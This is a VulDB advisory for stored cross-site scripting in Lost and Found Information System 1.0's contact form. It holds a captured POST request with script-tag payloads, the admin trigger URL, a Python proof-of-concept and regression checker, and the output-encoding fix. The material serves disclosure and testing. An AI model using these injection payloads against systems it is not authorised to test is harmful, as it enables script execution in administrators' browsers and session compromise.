| Field | Value |
|---|---|
| Title | Stored XSS in Lost and Found Information System 1.0: admin "View message" page for messages sent from the contact form |
| Description | Stored cross-site scripting in Lost and Found Information System 1.0. The `fullname`, `contact` and `message` fields of the public contact form (`classes/Master.php?f=save_inquiry`) are stored as submitted and rendered without output encoding when an administrator opens the message in the admin panel (`inquiries/view_inquiry`), so script injected by a visitor executes in the administrator's browser. Request and trigger URL below. |
| Source | https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html |
| User | huutuanbg97 (UID 45015) |
| Submission | 05/11/2023 15:33 |
| Moderation | 05/12/2023 08:01 (16 hours later) |
| Status | Accepted |
| VulDB entry | 228887 [SourceCodester Lost and Found Information System 1.0 Contact Form Master.php?f=save_inquiry fullname/contact/message cross site scripting] |
| Points | 20 |

Detail:

Product: Lost and Found Information System
Version: 1.0

Request, as captured from the contact form at `/php-lfis/?page=contact`. The three injected fields are `fullname`, `contact` and `message`; the `id` and `visitor` parts are sent empty for a new inquiry. The `">` prefix of each payload closes an attribute before the `<script>` tag, so it fires whether the stored value is echoed inside an attribute or as element text:

```http
POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3651031312771010866996354889
Content-Length: 839
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lfis/?page=contact
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="id"


-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="visitor"


-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="fullname"

Tuan"><script>alert('1')</script>
-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="contact"

Tuan"><script>alert('2')</script>
-----------------------------3651031312771010866996354889
Content-Disposition: form-data; name="message"

Tuan"><script>alert('3')</script>
-----------------------------3651031312771010866996354889--
```

View effect (the stored payload executes when an administrator opens the inquiry):

/php-lfis/admin/?page=inquiries/view_inquiry&id=2
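The following script is an added example, not part of the VulDB submission and not code from the Lost and Found Information System. It reproduces the report's request with a unique marker in the three affected fields and then checks whether the admin view page returns that marker inside a live `<script>` element (vulnerable) or only in HTML-encoded form (fixed). The base URL (`/php-lfis` under a host of your choice), the admin session cookie and the inquiry id are supplied on the command line because the report does not show what `save_inquiry` returns; the email address is constructed. The request builder and the verdict logic are pure functions so they can be exercised offline.

```python
"""Stored-XSS reproduction and regression check for the contact form of
Lost and Found Information System 1.0 (added example; assumptions marked)."""
import html
import re
import sys
import uuid
import urllib.request

# Unique marker so a hit in the admin page is unambiguously our submission.
MARKER = "lfisxss" + uuid.uuid4().hex[:8]
# Same shape as the report's payload: close an attribute, then inject a tag.
PAYLOAD = f'Tuan"><script>alert(\'{MARKER}\')</script>'


def build_multipart(fields: dict[str, str], boundary: str) -> bytes:
    """Encode fields the way the captured browser request did: one part per
    field, an empty body for empty fields (id/visitor), CRLF line endings."""
    lines = []
    for name, value in fields.items():
        lines.append(f"--{boundary}")
        lines.append(f'Content-Disposition: form-data; name="{name}"')
        lines.append("")          # blank line separating part headers from body
        lines.append(value)
    lines.append(f"--{boundary}--")
    lines.append("")
    return "\r\n".join(lines).encode("utf-8")


def classify_rendering(page_html: str, marker: str) -> str:
    """'vulnerable' if the marker sits inside a real <script> element,
    'escaped' if it is present but only as encoded text (e.g. &lt;script&gt;),
    'absent' if the page does not contain the marker at all."""
    if marker not in page_html:
        return "absent"
    # A live <script ...> tag followed by the marker with no other tag in
    # between; an encoded reflection never contains a literal '<script'.
    if re.search(r"<script[^>]*>[^<]*" + re.escape(marker), page_html, re.I):
        return "vulnerable"
    return "escaped"


def submit_inquiry(base_url: str, payload: str) -> None:
    """POST the contact form exactly like the report (no authentication)."""
    boundary = "----lfispoc" + uuid.uuid4().hex
    body = build_multipart(
        {"id": "", "visitor": "", "fullname": payload,
         "email": "poc@example.com",      # constructed address
         "contact": payload, "message": payload},
        boundary,
    )
    req = urllib.request.Request(
        f"{base_url}/classes/Master.php?f=save_inquiry", data=body, method="POST",
        headers={"Content-Type": f"multipart/form-data; boundary={boundary}",
                 "X-Requested-With": "XMLHttpRequest"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        resp.read()


def fetch_admin_view(base_url: str, inquiry_id: str, admin_cookie: str) -> str:
    """Load the page the report names as the trigger, as the administrator."""
    req = urllib.request.Request(
        f"{base_url}/admin/?page=inquiries/view_inquiry&id={inquiry_id}",
        headers={"Cookie": admin_cookie},   # e.g. "PHPSESSID=..." (assumption)
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def main(argv: list[str]) -> int:
    if len(argv) != 4:
        print("usage: poc.py http://HOST/php-lfis INQUIRY_ID 'PHPSESSID=...'")
        return 2
    base_url, inquiry_id, admin_cookie = argv[1], argv[2], argv[3]
    submit_inquiry(base_url, PAYLOAD)
    verdict = classify_rendering(fetch_admin_view(base_url, inquiry_id, admin_cookie), MARKER)
    print(f"marker {MARKER}: {verdict}")
    return 1 if verdict == "vulnerable" else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The standard remediation on the PHP side is output encoding at render time, `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` on each of `fullname`, `contact` and `message` where the admin page echoes them (this is the generic fix, not a quote of the project's code); after that change the checker reports `escaped`, because the marker is still stored and displayed but no longer reaches the parser as a tag.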